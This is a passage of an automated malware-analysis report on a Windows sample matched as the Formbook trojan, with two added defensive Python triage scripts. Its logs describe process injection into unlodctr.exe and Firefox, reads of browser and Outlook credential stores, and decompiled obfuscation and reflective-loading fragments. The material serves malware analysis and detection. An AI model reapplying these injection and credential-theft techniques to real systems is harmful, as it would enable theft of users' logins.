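    for m in RECORD.finditer(text):
        pid, addr = int(m.group(1)), int(m.group(2), 16)
        nt_apis = [a for a in m.group(3).rstrip(",").split(",") if a.startswith("Nt")]
        if nt_apis:
            stubs[pid][nt_apis[0]].add(addr)
    return stubs


def relocation_delta(stubs, pid_a, pid_b):
    """Return (delta, support): delta = address in pid_b minus address in pid_a that
    explains the most API names shared by both processes; None if none are shared."""
    votes = Counter()
    for api in stubs[pid_a].keys() & stubs[pid_b].keys():
        for a in stubs[pid_a][api]:
            for b in stubs[pid_b][api]:
                votes[b - a] += 1
    if not votes:
        return None
    return votes.most_common(1)[0]


def split_by_delta(stubs, pid_a, pid_b, delta):
    """Partition pid_a's stubs into those whose counterpart sits at addr+delta in
    pid_b (one image, relocated) and those without one (some other code region)."""
    matched, outliers = {}, {}
    for api, addrs in stubs[pid_a].items():
        for a in addrs:
            if a + delta in stubs[pid_b].get(api, ()):
                matched[api] = a
            else:
                outliers.setdefault(api, []).append(a)
    return matched, outliers


if __name__ == "__main__":
    stubs = parse_stubs(REPORT_LINES)
    delta, support = relocation_delta(stubs, 4, 8)
    print(f"pid 8 image base = pid 4 image base + {delta:#x} ({support} APIs agree)")
    _, outliers = split_by_delta(stubs, 8, 4, -delta)
    for api, addrs in sorted(outliers.items()):
        print("  not in the relocated image:", api, [f"{a:#010x}" for a in addrs])
```

On the records above the vote is unanimous at 0x1670000, which is the base difference between the two mappings; the same check run against a full report will flag any process whose Nt* stubs cannot be explained by one relocation, which is where a second payload stage or a separately mapped module would show up.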
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000002.2314807218.0000000000EBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2318845405.0000000005750000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs file.exe
Source: file.exe, 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000002.2315834889.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs file.exe
Source: file.exe, 00000000.00000002.2316360086.0000000003F2D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.2319858454.00000000073F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000004.00000002.2845166430.0000000001ACD000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNLODCTR.EXEj% vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameuQDZ.exeX vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
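The "OriginalFilename ... vs file.exe" records compare the OriginalFilename value of every VS_VERSIONINFO block found in the file or in process memory with the name the sample was delivered under. The stray characters after the extension (the T in clr.dllT, the D in SimpleLogin.dllD, the j% in ntdll.dllj%) are most likely over-read by the report's string extractor rather than part of the value. Read the hits with the source in mind: in a memory dump the version resources of legitimately loaded modules (clr.dll, ntdll.dll) are expected; UNLODCTR.EXE turning up inside file.exe (process 4) is consistent with that process having mapped the image it later runs as process 8; SimpleLogin.dll and Tyrone.dll are modules present in memory but not on disk; and uQDZ.exe, found in the file itself, is the OriginalFilename compiled into the sample, so the on-disk name file.exe is not the name it was built with. Together with "invalid certificate" (a security directory is present but the signature does not verify; Get-AuthenticodeSignature on the host shows the same status), that mismatch is a cheap static triage signal. The following is an added example (not from the report) that reproduces the check offline on a constructed dump: it finds each UTF-16LE OriginalFilename key, skips the DWORD padding, reads the NUL-terminated value, and reports those that differ from the on-disk name.

```python
import sys
from pathlib import Path

# UTF-16LE key as it appears in a VS_VERSIONINFO String entry, with its terminator.
KEY = "OriginalFilename".encode("utf-16-le") + b"\x00\x00"
MAX_VALUE_BYTES = 2 * 260   # MAX_PATH characters; bounds the scan on a damaged dump


def original_filenames(data: bytes):
    """Yield (offset, value) for every OriginalFilename found in a PE or memory dump.

    A String entry stores the key as a NUL-terminated UTF-16LE string, pads to a
    DWORD boundary, then stores the NUL-terminated UTF-16LE value. The scan does
    not walk the resource tree, so it works on raw process memory as well.
    """
    pos = 0
    while (idx := data.find(KEY, pos)) >= 0:
        p = idx + len(KEY)
        while data[p:p + 2] == b"\x00\x00":          # skip alignment padding
            p += 2
        end = p
        while end + 2 <= len(data) and end - p < MAX_VALUE_BYTES and data[end:end + 2] != b"\x00\x00":
            end += 2
        try:
            value = data[p:end].decode("utf-16-le")
        except UnicodeDecodeError:                    # key hit inside non-text bytes
            value = ""
        if value:
            yield idx, value
        pos = end


def mismatches(data: bytes, on_disk_name: str):
    """OriginalFilename values that differ (case-insensitively) from the name the
    file was delivered under. Renamed or repackaged binaries show up here; so do
    the version resources of other modules when `data` is a process dump."""
    return [(off, v) for off, v in original_filenames(data)
            if v.lower() != on_disk_name.lower()]


def _string_entry(key: str, value: str) -> bytes:
    """Constructed test data: the key/padding/value part of one String entry."""
    k = key.encode("utf-16-le") + b"\x00\x00"
    k += b"\x00" * ((4 - len(k) % 4) % 4)
    return k + value.encode("utf-16-le") + b"\x00\x00"


# Constructed stand-in for a process dump: three version-resource fragments
# separated by unrelated bytes. The names echo this report's findings.
SAMPLE_DUMP = (
    b"\x90" * 16
    + _string_entry("CompanyName", "Contoso")
    + _string_entry("OriginalFilename", "SimpleLogin.dll")
    + b"\xcc" * 7
    + _string_entry("OriginalFilename", "file.exe")
    + b"\x00" * 9
    + _string_entry("OriginalFilename", "uQDZ.exe")
)


if __name__ == "__main__":
    # Usage: python origname.py <file-or-dump>; with no argument, scans SAMPLE_DUMP.
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    data, name = (target.read_bytes(), target.name) if target else (SAMPLE_DUMP, "file.exe")
    for off, v in mismatches(data, name):
        print(f"{off:#010x}  OriginalFilename={v!r}  vs  {name}")
```

Run against the sample on disk it should surface uQDZ.exe alone; run against a dump of process 0 it surfaces the in-memory SimpleLogin.dll and Tyrone.dll modules as well, and the loaded runtime DLLs, which is why the comparison is a triage hint and not a verdict on its own.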
Source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, I2uc7WT7LwxsvBMWY7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.73f0000.10.raw.unpack, I2uc7WT7LwxsvBMWY7.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.file.exe.7060000.9.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.file.exe.2c49a04.4.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/1@4/4
Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\FztGqmkrzPKOxqz
Source: C:\Windows\SysWOW64\unlodctr.exe File created: C:\Users\user\AppData\Local\Temp\17-EIW25
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unlodctr.exe, 00000008.00000002.3513851473.000000000092A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3513851473.000000000095E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: loadperf.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\rgGVtZHsFDmobUiUfhFQeaCpbrDOXlmOrOIcCUcMChxsmEv\LHmmkoXQgKLVlTwFJILFF.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\unlodctr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unlodctr.pdbGCTL source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2734692610.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000000.2915078639.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: unlodctr.pdb source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: file.exe, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 0.2.file.exe.2c49a04.4.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.7060000.9.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 0.2.file.exe.2c38d8c.3.raw.unpack, XG.cs .Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})
Source: 8.2.unlodctr.exe.363cd08.2.raw.unpack, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 9.2.LHmmkoXQgKLVlTwFJILFF.exe.2b6cd08.1.raw.unpack, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 9.0.LHmmkoXQgKLVlTwFJILFF.exe.2b6cd08.1.raw.unpack, Form1.cs .Net Code: LateBinding.LateCall((object)methodInfo, (Type)null, "Invoke", new object[2]{0,new string[3]{BN[0],BN[1],"VPBiblioteka"}}, (string[])null, (bool[])null)
Source: 0.2.file.exe.73f0000.10.raw.unpack, ijXhqSg1KPhojxnTQi.cs .Net Code: uMBYjMVglW System.Reflection.Assembly.Load(byte[])
Source: 0.2.file.exe.3fe35c8.6.raw.unpack, ijXhqSg1KPhojxnTQi.cs .Net Code: uMBYjMVglW System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_010BCFA8 push eax; ret 0_2_010BCFA9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05115E32 push ecx; iretd 0_2_05115E33
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0041789D push es; retf 4_2_0041789E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040D0AF push esi; iretd 4_2_0040D0B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0040CA39 push ebp; ret 4_2_0040CA53
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00413B53 push esi; iretd 4_2_00413C4C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00413B93 push esi; iretd 4_2_00413C4C
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0041839C push ebp; iretd 4_2_0041839E
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00413C54 push 203B2B75h; iretd 4_2_00413C6B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00403500 push eax; ret 4_2_00403502
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_00405648 push esp; retf 4_2_0040564D
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0041878A push ds; iretd 4_2_0041878B
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_019D09AD push ecx; mov dword ptr [esp], ecx 4_2_019D09B6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0301225F pushad ; ret 8_2_030127F9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030127FA pushad ; ret 8_2_030127F9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030409AD push ecx; mov dword ptr [esp], ecx 8_2_030409B6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0301283D push eax; iretd 8_2_03012858
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03011200 push eax; iretd 8_2_03011369
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00372160 push dword ptr [edi+36E8C72Ch]; retf 8_2_003721BD
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00352145 push esp; retf 8_2_0035214A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00360751 push 203B2B75h; iretd 8_2_00360768
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00360741 push esi; iretd 8_2_00360749
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00364E99 push ebp; iretd 8_2_00364E9B
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00369050 push esp; retf 8_2_003690B2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00369050 pushfd ; retf 0DE4h 8_2_00369157
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_003690A3 push esp; retf 8_2_003690B2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0036B145 pushad ; retf 8_2_0036B14E
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_00365287 push ds; iretd 8_2_00365288
Source: file.exe Static PE information: section name: .text entropy: 7.960811325672934
